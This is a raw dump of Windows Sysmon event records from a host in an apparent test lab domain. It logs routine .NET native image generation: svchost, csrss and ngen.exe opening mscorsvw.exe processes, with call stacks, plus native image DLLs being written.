13:49:50.526{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FE-6005-6603-00000000A301}3812C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007745Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:50.215{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FE-6005-6503-00000000A301}4552C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007744Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:50.198{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91FE-6005-6503-00000000A301}4552C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007743Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:50.198{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FE-6005-6503-00000000A301}4552C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007742Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:50.151{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FE-6005-6403-00000000A301}4236C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007741Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:50.135{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91FE-6005-6403-00000000A301}4236C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007740Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:50.135{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FE-6005-6403-00000000A301}4236C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007739Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:50.088{59A5CD1D-91FD-6005-6203-00000000A301}4584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\11e8-0\Microsoft.Activities.Build.dll2021-01-18 13:49:50.088 10341000x80000000000000007754Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:51.260{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FF-6005-6803-00000000A301}4448C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007753Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:51.245{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91FF-6005-6803-00000000A301}4448C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007752Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:51.245{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FF-6005-6803-00000000A301}4448C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007768Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:54.807{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9202-6005-6C03-00000000A301}2244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007767Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:54.791{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9202-6005-6C03-00000000A301}2244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007766Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:54.791{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9202-6005-6C03-00000000A301}2244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007765Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:54.729{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9202-6005-6B03-00000000A301}4768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007764Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:54.729{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9202-6005-6B03-00000000A301}4768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007763Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:54.729{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9202-6005-6B03-00000000A301}4768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007762Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:54.666{59A5CD1D-9202-6005-6A03-00000000A301}4480C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1180-0\Microsoft.Build.Conversion.v4.0.dll2021-01-18 13:49:54.666 10341000x80000000000000007761Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:54.541{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9202-6005-6A03-00000000A301}4480C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007760Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:54.526{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9202-6005-6A03-00000000A301}4480C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007759Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:54.526{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9202-6005-6A03-00000000A301}4480C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007758Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:54.385{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9202-6005-6903-00000000A301}5032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007757Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:54.370{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9202-6005-6903-00000000A301}5032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007756Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:54.370{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9202-6005-6903-00000000A301}5032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007755Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:54.198{59A5CD1D-91FF-6005-6803-00000000A301}4448C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1160-0\Microsoft.Build.dll2021-01-18 13:49:54.198 